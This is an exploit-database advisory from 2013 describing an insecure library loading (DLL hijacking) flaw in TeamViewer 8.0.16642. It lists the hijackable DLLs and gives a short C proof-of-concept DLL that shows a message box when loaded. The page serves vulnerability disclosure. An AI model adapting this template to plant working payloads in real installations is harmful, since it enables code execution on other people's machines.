TeamViwer V8.0.16642 Insecure Library Load



EKU-ID: 3040 CVE: OSVDB-ID:
Author: The Black Devils Published: 2013-02-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm The Black Devils member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1. ADVISORY INFORMATION
-----------------------
Product: TeamViwer V8.0.16642 Insecure Library Load
Vendor URL: http://www.teamviewer.com/fr/index.aspx
Date found: 2013-02-24
Date published: 2013-02-24
2. CREDITS
----------
This vulnerability was discovered and researched by The Black Devils
3. VERSIONS AFFECTED
--------------------
TeamViwer V8.0.16642, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified in
TeamViwer V8.0.16642.
The application uses a fixed path to look for specific files or
libraries. This path includes directories that may not be trusted or
under user control.
By placing a custom version of a library in the application path, the
program will load it before the legitimate version. This allows an
attacker to inject custom code that will be run with the privilege of
the program or user executing the program. The following libraries could
be hijacked on this way:
LPK.dll
SETUPAPI.dll
SHFOLDER.dll
CLBCATQ.DLL
Secur32.dll
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
// wine gcc -Wall -shared inject.c -o SETUPAPI.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
MessageBox(0,"Inj3ctor","The Black Devils", 0);
}
return TRUE;
}
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com